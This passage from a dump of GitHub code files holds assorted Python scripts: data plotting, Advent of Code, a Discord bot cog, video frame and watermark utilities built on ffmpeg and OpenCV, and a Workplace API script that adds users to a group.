plt\nimport multiprocessing\nimport statistics\nimport pandas as pd\n\nwith open(\"horizontal_prediction_error\", \"r\", newline = \"\") as f:\n    reader = csv.reader(f)\n    h_data = list(reader)\n\nwith open(\"vertical_prediction_error\", \"r\", newline = \"\") as f:\n    reader = csv.reader(f)\n    v_data = list(reader)[:len(h_data)]\n\ncomponents = [\"X-component\", \"Y-component\", \"Z-component\"]\n\nh_error = {}\nv_error = {}\nfor c in components:\n    h_error[c] = []\n    v_error[c] = []\n\nfor i in range(len(v_data)):\n    for j in range(len(v_data[i])):\n        h_data[i][j] = float(h_data[i][j])\n        v_data[i][j] = float(v_data[i][j])\n    v_error[\"X-component\"].append(v_data[i][0])\n    v_error[\"Y-component\"].append(v_data[i][1])\n    v_error[\"Z-component\"].append(v_data[i][2])\n\n    h_error[\"X-component\"].append(h_data[i][0])\n    h_error[\"Y-component\"].append(h_data[i][1])\n    h_error[\"Z-component\"].append(h_data[i][2])\n\n\ncolors = [\"magenta\", \"tan\", \"lime\"]\n\ndf_v=pd.DataFrame.from_dict(v_error,orient='index').transpose()\n\n\nf, axs = plt.subplots(3, sharex=False, gridspec_kw={'hspace': 0.65}) # \"height_ratios\": (.16, .16, .16, .16, .16, 
.16)\n\n#sns.violinplot(data=df_h, palette = c_palette, orient=\"h\").set( \n# xlabel='Error (N)'\n#) #ax=axs_h[0], \n\nsns.distplot(df_h[\"X-component\"], ax=axs_h[0], color = colors[0], hist = False, kde = True).set(\n xlabel='Error for X-component (N)', \n ylabel='Density'\n)\nsns.distplot(df_h[\"Y-component\"], ax=axs_h[1], color = colors[1], hist = False, kde = True).set(\n xlabel='Error for Y-component (N)', \n ylabel='Density'\n)\nsns.distplot(df_h[\"Z-component\"], ax=axs_h[2], color = colors[2], hist = False, kde = True).set(\n xlabel='Error for Z-component (N)', \n ylabel='Density'\n)\nf_h.suptitle(\"Error Distribution for Horizontal Configuration\")\n\nsns.set(font_scale=2)\nplt.show()\n \n#import pdb; pdb.set_trace()\n#mu=np.array([1,10,20])\n# Let's change this so that the points won't all lie in a plane...\n#sigma=np.matrix([[20,10,10],\n# [10,25,1],\n# [10,1,50]])\n\n#data=np.random.multivariate_normal(mu,sigma,1000)\n#random.shuffle(data)\n#data = np.array(data[:10000])\n#values = data.T\n\n'''x = np.array(x)\ny = np.array(y)\nz = np.array(z)\n\n#print(x.shape)\n\nxyz = np.vstack([x,y,z])\nkde = stats.gaussian_kde(xyz)\n\n\ndef calc_kde(data):\n print(len(data))\n return kde(data.T)\n\ndef main():\n\n\n # Evaluate kde on a grid\n xmin, ymin, zmin = x.min(), y.min(), z.min()\n xmax, ymax, zmax = x.max(), y.max(), z.max()\n xi, yi, zi = np.mgrid[xmin:xmax:30j, ymin:ymax:30j, zmin:zmax:30j]\n coords = np.vstack([item.ravel() for item in [xi, yi, zi]]) \n\n cores = multiprocessing.cpu_count()\n pool = multiprocessing.Pool(processes=4)\n results = pool.map(calc_kde, np.array_split(coords.T, 2))\n density = np.concatenate(results).reshape(xi.shape)\n #density = kde(coords).reshape(xi.shape)\n\n # Plot scatter with mayavi\n figure = mlab.figure('DensityPlot')\n\n grid = mlab.pipeline.scalar_field(xi, yi, zi, density)\n min = density.min()\n max = density.max()\n mlab.pipeline.volume(grid, vmin=min ,vmax=min + .8*(max-min)) #, vmin=min ,vmax=min + .5*(max-min)\n\n mlab.axes()\n mlab.savefig(filename='test.png', magnification = 10)\n mlab.show()\n\nif __name__ == '__main__': \n main()\n\n'''","repo_name":"JieYingWu/dvrk_force_estimation","sub_path":"direct_method/error_distribution.py","file_name":"error_distribution.py","file_ext":"py","file_size_in_byte":4625,"program_lang":"python","lang":"en","doc_type":"code","stars":6,"dataset":"github-code","pt":"21"} +{"seq_id":"43738006889","text":"#!/usr/bin/env python3\n# snippet01a.py\n# Micah Raabe\n\n# Lab 32 - Snippet.split.join\n\ntxtfile = open('ls_mycode.txt', 'r')\ntxtfile_list = txtfile.readlines()\ntxtfile.close()\n\nfor i in range(len(txtfile_list)):\n txtfile_list[i] = txtfile_list[i].strip() # strip out the newline characters\n\ntxtfile_lista = \" \".join(txtfile_list) # join the list with a single whitespace\nprint('\\n' + txtfile_lista)\n\ntxtfile_listb = \"\\t\".join(txtfile_list) # join the list with a tab\nprint('\\n' + txtfile_listb)\n\n","repo_name":"gmraabe/mycode","sub_path":"snippet01/snippet01a.py","file_name":"snippet01a.py","file_ext":"py","file_size_in_byte":530,"program_lang":"python","lang":"en","doc_type":"code","stars":10,"dataset":"github-code","pt":"21"} +{"seq_id":"7813869441","text":"\ndef shiny_gold_size(values, value=1, bag=\"shiny gold bag\", res=0):\n stores = values[bag]\n if not stores:\n return res\n for k, v in stores.items():\n res += v * value\n res = shiny_gold_size(values, v * value, k, res)\n return res\n\n\ndef main():\n with open('input.txt') as f:\n lines = f.read().splitlines()\n 
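# e.g. the input line \"light red bags contain 1 bright white bag, 2 muted yellow bags.\"\n    # is parsed below into {\"light red bag\": {\"bright white bag\": 1, \"muted yellow bag\": 2}}\n    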
formatted_values = {}\n for line in lines:\n key, values = line.split(\" contain \")\n key = key[:-1]\n values = values.split(\", \")\n formatted_values[key] = {}\n for value in values:\n value = value.replace(\"bags\", \"bag\").replace(\".\", \"\")\n amount, name = value.split(\" \", 1)\n if amount != \"no\":\n formatted_values[key][name] = int(amount)\n else:\n formatted_values[key] = None\n print(formatted_values)\n print(f\"Result is {shiny_gold_size(formatted_values)}\")\n\n\nif __name__ == \"__main__\":\n main()\n","repo_name":"schovancova/adventOfCode2020","sub_path":"7/solution_part_2.py","file_name":"solution_part_2.py","file_ext":"py","file_size_in_byte":1012,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"10206288190","text":"import discord\nfrom discord.ext import commands\nimport datetime \n\nEMOJIS = [\n \"1️⃣\",\n \"2️⃣\",\n \"3️⃣\",\n \"4️⃣\",\n \"5️⃣\",\n \"6️⃣\",\n \"7️⃣\",\n \"8️⃣\",\n \"9️⃣\",\n \"🔟\"\n]\n\nclass MoviesRater(commands.Cog):\n def __init__(self,client):\n self.client = client\n\n @commands.has_role('Moderators')\n @commands.command()\n async def movie(self, ctx, *, title):\n embed = discord.Embed(\n title=f\"{title}\",\n colour=1234567,\n timestamp=datetime.datetime.utcnow()\n )\n message = await ctx.send(embed=embed)\n for emoji in EMOJIS:\n await message.add_reaction(emoji)\n\ndef setup(client):\n client.add_cog(MoviesRater(client))","repo_name":"Sajan491/Asuma","sub_path":"cogs/moviesRater.py","file_name":"moviesRater.py","file_ext":"py","file_size_in_byte":768,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"14116555584","text":"from tkinter import*\n\n\ndef Logout():\n root1=Tk()\n root1.title(\"LogOut\")\n root1.geometry(\"400x300\")\n root1.configure(bg='light blue')\n label2=Label(root1,text=\"Logout Successful\",font=(\"Nueva Std Cond\",15,\"bold\"),fg='green',bg='light blue').place(x=100.5,y=120.0)\n root1.after(2000, lambda: root1.destroy())\n root1.mainloop()","repo_name":"kasthuri28/Blithe","sub_path":"src/Logout.py","file_name":"Logout.py","file_ext":"py","file_size_in_byte":345,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"12917100547","text":"## imporation\nimport shutil\nimport os\nimport numpy as np\nimport glob\n\n\ndef load_raw_dataset(label_to_file, output_folder):\n \"\"\"\n \"\"\"\n\n ## paramaters\n file_list = []\n\n ## create file list\n for k in label_to_file:\n flist = label_to_file[k]\n for f in flist:\n if(f not in file_list):\n file_list.append(f)\n\n ## create raw sub folder\n if(not os.path.isdir(output_folder+\"/raw_data\")):\n os.mkdir(output_folder+\"/raw_data\")\n\n ## copy all files into raw sub folder\n for f in file_list:\n destination = f.split(\"/\")\n destination = destination[-1]\n destination = output_folder+\"/raw_data/\"+destination\n shutil.copy(f, destination)\n\n\n\n\ndef normalize_dataset(output_folder):\n \"\"\"\n IN PROGRESS\n \"\"\"\n\n ## importation\n import pandas as pd\n\n ## parameters\n marker_to_scalar = {}\n marker_to_mean = {}\n marker_to_std = {}\n marker_list = []\n\n ## create normalized sub folder\n if(not os.path.isdir(output_folder+\"/normalized_data\")):\n os.mkdir(output_folder+\"/normalized_data\")\n\n ## identify target files & markers\n target_files = glob.glob(output_folder+\"/raw_data/*.csv\")\n df = pd.read_csv(target_files[0])\n for k in list(df.keys()):\n if(k not in [\"centroid_X\", 
\"centroid_Y\"]):\n marker_list.append(k)\n marker_to_scalar[k] = []\n\n ## Part 1 - get the mean and std for all markers\n for tf in target_files:\n\n #-> load data\n df = pd.read_csv(tf)\n\n #-> loop over data & get scalars for each markers\n for index, row in df.iterrows():\n for k in list(row.keys()):\n if(k in marker_list):\n marker_to_scalar[k].append(row[k])\n\n ## compute mean and std\n for k in marker_to_scalar.keys():\n vector = marker_to_scalar[k]\n marker_to_mean[k] = np.mean(vector)\n marker_to_std[k] = np.std(vector)\n\n ## Part 2 - Apply standardization\n ## loop over fcs file\n for tf in target_files:\n\n #-> load dataframe\n df = pd.read_csv(tf)\n\n #-> apply standardization\n for marker in marker_list:\n df[marker] = ((df[marker] - marker_to_mean[marker]) / marker_to_std[marker])\n\n #-> save dataframe to normalize file\n output_name = tf.replace(\".csv\", \"_normalized.csv\")\n output_name = output_name.replace(\"raw_data\", \"normalized_data\")\n df.to_csv(output_name, index=False)\n\n\n\n\ndef simple_discretization(output_folder):\n \"\"\"\n \"\"\"\n\n ## importation\n import pandas as pd\n import glob\n\n ## create normalized sub folder\n if(not os.path.isdir(output_folder+\"/discretized_data\")):\n os.mkdir(output_folder+\"/discretized_data\")\n\n ## loop over target files\n for tf in glob.glob(output_folder+\"/normalized_data/*_normalized.csv\"):\n\n #-> init new matrix\n matrix = []\n\n #-> load target files\n df = pd.read_csv(tf)\n\n #-> get header\n header = list(df.keys())\n\n #-> discretize\n for index, row in df.iterrows():\n vector = []\n for k in list(row.keys()):\n if(k in [\"centroid_X\", \"centroid_Y\"]):\n vector.append(row[k])\n else:\n scalar = row[k]\n new_scalar = \"NA\"\n\n #--> discretize\n if(scalar < 0.2):\n new_scalar = 0\n elif(scalar < 0.4):\n new_scalar = 1\n elif(scalar < 0.6):\n new_scalar = 2\n elif(scalar < 0.8):\n new_scalar = 3\n elif(scalar <= 1):\n new_scalar = 4\n elif(scalar <= 2):\n new_scalar = 5\n else:\n new_scalar = 6\n\n # update vector\n vector.append(new_scalar)\n\n # update matrix\n matrix.append(vector)\n\n ## craft and save csv\n df = pd.DataFrame(matrix, columns=header)\n output_name = tf.replace(\".csv\", \"_discretized.csv\")\n output_name = output_name.replace(\"normalized_data\", \"discretized_data\")\n df.to_csv(output_name, index=False)\n","repo_name":"Nurtal/HYPERNET","sub_path":"dataset_manager.py","file_name":"dataset_manager.py","file_ext":"py","file_size_in_byte":4337,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"70090440374","text":"import gzip\n\nfrom Bio import SeqIO\n\nwith gzip.open(snakemake.output.comb, \"wt\") as combOut, \\\n open(snakemake.output.sample, \"w\") as sampleOut, \\\n open(snakemake.output.name, \"w\") as nameOut:\n for sample, fileInfo in snakemake.params.files.items():\n #print(fileInfo)\n for inFile in fileInfo[int(snakemake.wildcards.readNum)-1]:\n with gzip.open(\"%s/%s\" % (snakemake.config[\"inFolder\"], inFile), \"rt\") as inStream:\n for rec in SeqIO.parse(inStream, \"fastq\"):\n newId = \"_\".join(rec.id.split(\":\")[2:])\n nameOut.write(\"%s\\t%s\\n\" % (rec.id, newId))\n rec.id = newId\n combOut.write(rec.format(\"fastq\"))\n sampleOut.write(\"%s\\t%s\\n\" % (newId, 
sample))\n","repo_name":"f-heeger/two_marker_metabarcoding","sub_path":"scripts/concatAll.py","file_name":"concatAll.py","file_ext":"py","file_size_in_byte":788,"program_lang":"python","lang":"en","doc_type":"code","stars":6,"dataset":"github-code","pt":"21"} +{"seq_id":"24438951592","text":"from pathlib import Path\nfrom typing import Optional, Sequence, TypeAlias, Literal\n\nimport click\n\nExperimentName: TypeAlias = Literal[\"rxn\", \"additions\"]\n\n\n@click.group\ndef dyn_beam_cli():\n pass\n\n\n@dyn_beam_cli.command()\n@click.option(\"--experiment\", \"-x\", type=click.Choice([\"rxn\", \"additions\"]), required=True)\n@click.option(\"--out_path\", \"-o\", type=click.Path(exists=True, path_type=Path), required=True)\n@click.option(\"--config\", \"-c\", type=click.Path(exists=True, path_type=Path), required=True)\n@click.option(\"--n_rep\", \"-n\", type=int, required=False)\n@click.option(\"--alphas\", \"-a\", type=float, required=False, multiple=True)\n@click.option(\"--seed\", \"-s\", type=int, required=False)\n@click.option(\"--pb/--no-pb\", default=True)\ndef predict(\n experiment: ExperimentName,\n out_path: Path,\n config: Path,\n n_rep: Optional[int] = None,\n alphas: Optional[Sequence[float]] = None,\n seed: Optional[int] = None,\n pb: bool = True,\n):\n \"\"\"Experiment entry point\n Usage: python -m confbeam_experiment.dyn_beams predict -x additions -o -c config.yaml\n \"\"\"\n # Importing in command to avoid long startup due to imports\n from confbeam_experiments.dyn_beams.cli import run_dynamic_beam_repetitions\n\n run_dynamic_beam_repetitions(\n experiment=experiment,\n out_path=out_path,\n config_path=config,\n n_rep=n_rep,\n alphas=alphas,\n seed=seed,\n progress_bar=pb,\n )\n\n\n@dyn_beam_cli.command()\n@click.option(\"--exp_dir\", type=click.Path(exists=True, path_type=Path), required=True)\n@click.option(\n \"--out_dir\",\n type=click.Path(exists=True, path_type=Path),\n required=False,\n default=None,\n)\ndef analyze(exp_dir: Path, out_dir: Optional[Path] = None):\n \"\"\"Aggregation entry point\n Usage: python -m confbeam_experiment.dyn_beams analze --exp_dir \n \"\"\"\n # Importing in command to avoid long startup due to imports\n from confbeam_experiments.dyn_beams.analysis import collect_result_from_dir\n from confbeam_experiments.dyn_beams.cli import dyn_beam_aggregate_results\n\n all_results = collect_result_from_dir(exp_dir)\n if out_dir is None:\n out_dir = exp_dir\n dyn_beam_aggregate_results(experiment_results=all_results, out_dir=out_dir)\n\n\nif __name__ == \"__main__\":\n dyn_beam_cli()\n","repo_name":"IBM/conformal_beam_search","sub_path":"src/confbeam_experiments/dyn_beams/__main__.py","file_name":"__main__.py","file_ext":"py","file_size_in_byte":2335,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"1324150119","text":"import shutil\nimport uuid\nimport time\n\nimport os\nimport subprocess\n\nimport cv2\nimport random\nfrom tqdm import tqdm\nimport numpy as np\nfrom PIL import Image\n\n\ndef load_video_to_cv2(input_path):\n video_stream = cv2.VideoCapture(input_path)\n fps = video_stream.get(cv2.CAP_PROP_FPS)\n full_frames = [] \n while 1:\n still_reading, frame = video_stream.read()\n if not still_reading:\n video_stream.release()\n break \n full_frames.append(cv2.cvtColor(frame, cv2.COLOR_BGR2RGB))\n return full_frames\n\n\ndef save_video_with_audio(video, audio, save_path):\n file_name = str(uuid.uuid4()) + '.mp4'\n save_file = os.path.join(save_path, file_name)\n if 
os.path.exists(audio):\n # If there is an audio file, include it in the ffmpeg command\n cmd = r'ffmpeg -y -i \"%s\" -i \"%s\" -c:v libx264 -c:a aac -crf 23 -preset medium -movflags +faststart -shortest \"%s\"' % (video, audio, save_file)\n else:\n # If there is no audio file, omit the audio input and codec options\n cmd = r'ffmpeg -y -i \"%s\" -c:v libx264 -crf 23 -preset medium -movflags +faststart \"%s\"' % (video, save_file)\n if os.environ.get('DEBUG', 'False') == 'True':\n # not silence run\n os.system(cmd)\n else:\n # silence run\n subprocess.run(cmd, shell=True, stdout=subprocess.DEVNULL, stderr=subprocess.DEVNULL)\n return file_name\n\n\ndef save_video_from_frames(frame_names, save_path, fps, alternative_save_path=None):\n # frames has to have name from 0\n frame_path = os.path.join(save_path, frame_names)\n file_name = str(uuid.uuid4())+'.mp4'\n if alternative_save_path:\n save_file = os.path.join(alternative_save_path, file_name)\n else:\n save_file = os.path.join(save_path, file_name)\n cmd = f'ffmpeg -framerate {fps} -i {frame_path} -c:v libx264 -vf \"pad=ceil(iw/2)*2:ceil(ih/2)*2\" -pix_fmt yuv420p {save_file}'\n if os.environ.get('DEBUG', 'False') == 'True':\n # not silence run\n os.system(cmd)\n else:\n # silence run\n subprocess.run(cmd, shell=True, stdout=subprocess.DEVNULL, stderr=subprocess.DEVNULL)\n return file_name\n\n\ndef video_to_frames(video_path, output_folder, start_seconds=0, end_seconds=None, extract_nth_frame=1, reduce_size=1):\n start_hms = seconds_to_hms(start_seconds)\n if end_seconds is not None:\n select_cmd = f\"select=between(t\\\\,{start_seconds}\\\\,{end_seconds})*not(mod(n\\\\,{extract_nth_frame}))\"\n else:\n select_cmd = f\"select=not(mod(n\\\\,{extract_nth_frame}))\"\n # Add the scale filter to reduce frame size by a factor\n vf_cmd = f\"{select_cmd},scale=iw/{int(reduce_size)}:ih/{int(reduce_size)}\" if reduce_size > 1 else select_cmd\n cmd = f'ffmpeg -ss {start_hms} -i \"{video_path}\" -vf \"{vf_cmd}\" -vsync vfr \"{output_folder}/%d.png\"'\n if os.environ.get('DEBUG', 'False') == 'True':\n # not silence run\n os.system(cmd)\n else:\n # silence run\n subprocess.run(cmd, shell=True, stdout=subprocess.DEVNULL, stderr=subprocess.DEVNULL)\n\n\ndef extract_audio_from_video(video_path, save_path):\n # Check if the file is a GIF\n try:\n with Image.open(video_path) as img:\n if img.format == 'GIF':\n print(f\"Skipping audio extraction because the file is a GIF\")\n return None\n except Exception as e:\n print(f\"Unable to determine image format: {e}\")\n\n # If not a GIF, proceed with audio extraction\n file_name = str(uuid.uuid4()) + '.wav'\n save_file = os.path.join(save_path, file_name)\n cmd = f'ffmpeg -i \"{video_path}\" -q:a 0 -map a? 
\"{save_file}\" -y'\n if os.environ.get('DEBUG', 'False') == 'True':\n # not silence run\n os.system(cmd)\n else:\n # silence run\n subprocess.run(cmd, shell=True, stdout=subprocess.DEVNULL, stderr=subprocess.DEVNULL)\n return file_name\n\n\ndef seconds_to_hms(seconds):\n hours, remainder = divmod(seconds, 3600)\n minutes, seconds = divmod(remainder, 60)\n return \"{:02}:{:02}:{:02}.{:03}\".format(int(hours), int(minutes), int(seconds), int((seconds % 1) * 1000))\n\n\ndef cut_start_video(video, video_start, video_end):\n if video_start == video_end:\n return video\n time.sleep(5)\n hms_start_format = seconds_to_hms(video_start)\n hms_end_format = seconds_to_hms(video_end)\n print(f\"Video will start from {hms_start_format} and end at {hms_end_format}\")\n new_video = f\"{video}_cut.mp4\"\n cmd = f\"ffmpeg -y -ss {hms_start_format} -to {hms_end_format} -i {video} -c copy {new_video}\"\n if os.environ.get('DEBUG', 'False') == 'True':\n # not silence run\n os.system(cmd)\n else:\n # silence run\n subprocess.run(cmd, shell=True, stdout=subprocess.DEVNULL, stderr=subprocess.DEVNULL)\n return new_video\n\n\ndef check_media_type(file_path):\n # Initialize a VideoCapture object\n cap = cv2.VideoCapture(file_path)\n\n # Count the number of frames\n frame_count = int(cap.get(cv2.CAP_PROP_FRAME_COUNT))\n\n # Clean up\n cap.release()\n\n # Check the number of frames to determine the type of media\n if frame_count > 1:\n return \"animated\"\n else:\n return \"static\"\n\n\ndef get_first_frame(file_path, source_current_time: float = 0):\n \"\"\"\n Get first frame from content\n :param file_path: file path\n :return: frame or NOne\n \"\"\"\n type_file = check_media_type(file_path)\n if type_file == \"static\":\n # It's an image or GIF\n img = cv2.imread(file_path)\n if img is not None:\n return img\n elif type_file == \"animated\":\n # It's a video\n cap = cv2.VideoCapture(file_path)\n # Get the frames per second of the video\n fps = cap.get(cv2.CAP_PROP_FPS)\n # Calculate the frame number\n num_frame = int(fps * source_current_time)\n # Set the video capture to the desired frame\n cap.set(cv2.CAP_PROP_POS_FRAMES, num_frame)\n\n ret, frame = cap.read()\n if ret:\n return frame\n else:\n raise ValueError(\"Could not read the video file.\")\n else:\n raise ValueError(\"Unsupported file format.\")\n\n return None\n\n\ndef save_frames(video: str, output_dir: str, rotate: int, crop: list, resize_factor: int):\n \"\"\"\n Extract frames from a video, apply resizing, rotation, and cropping, and save them to an output directory.\n\n :param video: path to the video file\n :param output_dir: path to the directory where frames should be saved\n :param rotate: number of 90-degree rotations\n :param crop: list with cropping coordinates [y1, y2, x1, x2]\n :param resize_factor: factor by which the frame should be resized\n :return: fps of the video, path to the directory containing frames\n \"\"\"\n print(\"Start reading video\")\n\n # Ensure the output directory exists\n os.makedirs(output_dir, exist_ok=True)\n\n video_stream = cv2.VideoCapture(video)\n fps = video_stream.get(cv2.CAP_PROP_FPS)\n frame_count = 0\n\n try:\n while True:\n still_reading, frame = video_stream.read()\n\n if not still_reading:\n break\n\n if resize_factor > 1:\n frame = cv2.resize(frame, (int(frame.shape[1] // resize_factor), int(frame.shape[0] // resize_factor)))\n\n for _ in range(rotate):\n frame = cv2.rotate(frame, cv2.ROTATE_90_CLOCKWISE)\n\n y1, y2, x1, x2 = crop\n x2 = x2 if x2 != -1 else frame.shape[1]\n y2 = y2 if y2 != -1 else 
frame.shape[0]\n\n frame = frame[y1:y2, x1:x2]\n\n # Save the frame to the output directory\n frame_filename = os.path.join(output_dir, f'frame{frame_count:04}.png')\n cv2.imwrite(frame_filename, frame)\n\n frame_count += 1\n\n finally:\n video_stream.release()\n\n print(f\"Number of frames saved: {frame_count}\")\n\n return fps, output_dir\n\n\n\ndef encrypted(video_path: str, save_dir: str, fn: int = 0):\n\n name = str(os.path.basename(os.path.dirname(os.path.dirname(os.path.dirname(os.path.abspath(__file__))))))\n media_type = check_media_type(video_path)\n\n if media_type == \"animated\":\n # Video objects for src\n src = cv2.VideoCapture(video_path)\n src_w = int(src.get(3))\n src_h = int(src.get(4))\n src_fps = src.get(cv2.CAP_PROP_FPS)\n src_frame_cnt = src.get(cv2.CAP_PROP_FRAME_COUNT)\n\n # Load a dummy image to get the shape attributes\n sec_frame_original = np.zeros((src_h, src_w, 3), dtype=np.uint8)\n\n if not os.path.exists(os.path.join(save_dir, 'enc')):\n os.mkdir(os.path.join(save_dir, 'enc'))\n\n # Create a progress bar\n pbar = tqdm(total=int(src_frame_cnt), unit='frames')\n\n while True:\n ret, src_frame = src.read()\n\n if ret == False:\n break\n\n # Create a copy of the dummy frame\n sec_frame = sec_frame_original.copy()\n\n # Put the text onto the dummy frame\n font_scale = int(max(src_w, src_h) // 600)\n font_thickness = int(font_scale // 0.5)\n\n # Define text position\n text_x = src_w // 4\n text_y = src_h // 2\n\n # Get the region where the text will be placed\n text_size = cv2.getTextSize(name, cv2.FONT_HERSHEY_SIMPLEX, font_scale, font_thickness)[0]\n region = src_frame[text_y - text_size[1]:text_y, text_x:text_x + text_size[0]]\n\n # Compute the mean color of the region\n mean_color = cv2.mean(region)[:3]\n\n # Compute the contrasting color\n contrast_color = tuple([255 - int(x) for x in mean_color])\n\n # Adjusting the coordinates to correctly position the text\n height, width = src_frame.shape[:2]\n\n # Get the size of the text\n (text_width, text_height), baseline = cv2.getTextSize(name, cv2.FONT_HERSHEY_SIMPLEX, font_scale, font_thickness)\n\n # Center positions\n center_x = width // 2\n center_y = height // 2\n\n # Define potential positions with padding along the edges (adjust as necessary)\n positions = [\n (0, text_height),\n (0, center_y + text_height // 2),\n (center_x - text_width // 2, text_height),\n (width - text_width, text_height),\n (0, height - baseline),\n (width - text_width, height - baseline),\n (center_x - text_width // 2, height - baseline),\n (width - text_width, center_y + text_height // 2),\n (int(width * 0.25) - text_width // 2, text_height),\n (int(width * 0.75) - text_width // 2, text_height),\n (int(width * 0.25) - text_width // 2, height - baseline),\n (int(width * 0.75) - text_width // 2, height - baseline),\n None, None, None\n ]\n\n # In each call to the method, select one random positions from the list\n selected_positions = random.sample(positions, 1)\n\n # Put text at the selected positions\n for pos in selected_positions:\n if pos is not None:\n cv2.putText(sec_frame, name, pos, cv2.FONT_HERSHEY_SIMPLEX, font_scale, contrast_color, font_thickness, cv2.LINE_AA)\n\n # Encryption for LSB 3 bits\n encrypted_img = (src_frame & 0b11111000) | (sec_frame >> 6 & 0b00000111)\n\n fn = fn + 1\n cv2.imwrite(os.path.join(save_dir, \"enc\", \"{}.png\".format(fn)), encrypted_img)\n\n pbar.update(1)\n\n pbar.close()\n src.release()\n\n # Delete encrypted video if already exists\n file_name = str(uuid.uuid4())+'.mp4'\n file_path = 
os.path.join(save_dir, file_name)\n\n # Save the video using ffmpeg as a lossless video; frame rate is kept the same\n cmd = f\"ffmpeg -framerate {src_fps} -i {os.path.join(save_dir, 'enc', '%d.png')} -c:v copy {file_path}\"\n if os.environ.get('DEBUG', 'False') == 'True':\n # not silence run\n os.system(cmd)\n else:\n # silence run\n subprocess.run(cmd, shell=True, stdout=subprocess.DEVNULL, stderr=subprocess.DEVNULL)\n # Delete the temporary image sequence folder\n shutil.rmtree(os.path.join(save_dir, 'enc'))\n\n else:\n # If the media is an image\n src_frame = cv2.imread(video_path)\n src_h, src_w = src_frame.shape[:2]\n\n # Load a dummy image to get the shape attributes\n sec_frame_original = np.zeros((src_h, src_w, 3), dtype=np.uint8)\n\n # Create a copy of the dummy frame\n sec_frame = sec_frame_original.copy()\n\n # Put the text onto the dummy frame\n font_scale = int(max(src_w, src_h) // 500)\n font_thickness = int(font_scale // 0.5)\n\n # Define text position\n text_x = src_w // 4\n text_y = src_h // 2\n\n # Get the region where the text will be placed\n text_size = cv2.getTextSize(name, cv2.FONT_HERSHEY_SIMPLEX, font_scale, font_thickness)[0]\n region = src_frame[text_y - text_size[1]:text_y, text_x:text_x + text_size[0]]\n\n # Compute the mean color of the region\n mean_color = cv2.mean(region)[:3]\n\n # Compute the contrasting color\n contrast_color = tuple([255 - int(x) for x in mean_color])\n\n # Adjusting the coordinates to correctly position the text\n height, width = src_frame.shape[:2]\n\n # Get the size of the text\n (text_width, text_height), baseline = cv2.getTextSize(name, cv2.FONT_HERSHEY_SIMPLEX, font_scale,\n font_thickness)\n\n # Center positions\n center_x = width // 2\n center_y = height // 2\n\n # Define potential positions with padding along the edges (adjust as necessary)\n positions = [\n (0, text_height),\n (0, center_y + text_height // 2),\n (center_x - text_width // 2, text_height),\n (width - text_width, text_height),\n (0, height - baseline),\n (width - text_width, height - baseline),\n (center_x - text_width // 2, height - baseline),\n (width - text_width, center_y + text_height // 2),\n (int(width * 0.25) - text_width // 2, text_height),\n (int(width * 0.75) - text_width // 2, text_height),\n (int(width * 0.25) - text_width // 2, height - baseline),\n (int(width * 0.75) - text_width // 2, height - baseline),\n ]\n\n # In each call to the method, select one random positions from the list\n selected_positions = random.sample(positions, 1)\n\n # Put text at the selected positions\n for pos in selected_positions:\n cv2.putText(sec_frame, name, pos, cv2.FONT_HERSHEY_SIMPLEX, font_scale, contrast_color, font_thickness, cv2.LINE_AA)\n\n # Encryption for LSB 3 bits\n encrypted_img = (src_frame & 0b11111000) | (sec_frame >> 6 & 0b00000111)\n\n # Save the encrypted image\n file_name = str(uuid.uuid4()) + '.png'\n file_path = os.path.join(save_dir, file_name)\n cv2.imwrite(file_path, encrypted_img)\n\n return file_name\n","repo_name":"wladradchenko/wunjo.wladradchenko.ru","sub_path":"portable/src/deepfake/src/utils/videoio.py","file_name":"videoio.py","file_ext":"py","file_size_in_byte":15261,"program_lang":"python","lang":"en","doc_type":"code","stars":404,"dataset":"github-code","pt":"21"} +{"seq_id":"31153398802","text":"# -*- coding:utf-8 -*-\nclass WordProcessing:\n def __init__(self, tagger):\n self.res_dic = {}\n self.tagger = tagger\n\n def morphological(self, text, word_class):\n node = self.tagger.parseToNode(text)\n\n i=0\n while node:\n word_feature 
= node.feature.split(',')\n if (word_feature[6] != '*') and (word_feature[0] in word_class):\n self.res_dic[str(i)] = [word_feature[6], word_feature[0]]\n i+=1\n node = node.next\n\n\n def set_res_dic(self, text, word_classes):\n for word_class in word_classes:\n self.morphological(text, word_class)\n\n\nif __name__ == \"__main__\":\n word_classes = ['名詞', '動詞']\n text = '中居正広の金曜日のスマたちへ逃げ恥,新垣結衣へ見た'\n\n import MeCab\n m = MeCab.Tagger(\"-d /usr/local/lib/mecab/dic/mecab-ipadic-neologd\")\n wp = WordProcessing(m)\n wp.set_res_dic(text, word_classes)\n\n print(wp.res_dic)\n print(m.parse (text))","repo_name":"kawamura-2022/MeCab_API","sub_path":"webapp/morphlogical.py","file_name":"morphlogical.py","file_ext":"py","file_size_in_byte":1007,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"23638596063","text":"\nimport requests\nimport csv\n\n# Constants\nGRAPH_URL_PREFIX = 'https://graph.workplace.com/'\nGRAPH_URL_SEPARATOR = '/'\nGRAPH_URL_MEMBER_EDGE = 'members'\nGRAPH_URL_EMAIL_FIELD = '?email='\n\n# Variables\naccess_token = 'your_access_token'\ngroup_id = 'your_group_id'\nfile_name = 'email_list.csv'\n\n# Methods\ndef sendAdditionRequest(access_token, endpoint):\n headers = buildHeader(access_token)\n result = requests.post(endpoint, headers=headers)\n result_console = endpoint + ' - adding user to group' + ' -> ' + result.text\n print (result_console)\n\ndef buildHeader(access_token):\n return {'Authorization': 'Bearer ' + access_token, \"User-Agent\": \"GithubRep-AddUsersToGroup\"}\n\ndef addUserToGroup(access_token, group_id, email):\n endpoint = GRAPH_URL_PREFIX + group_id + GRAPH_URL_SEPARATOR + GRAPH_URL_MEMBER_EDGE + GRAPH_URL_EMAIL_FIELD + email\n sendAdditionRequest(access_token, endpoint)\n\n\n## START\n\nwith open(file_name, newline='') as f:\n reader = csv.reader(f)\n next(reader) #Skip header\n for row in reader:\n addUserToGroup(access_token, group_id, 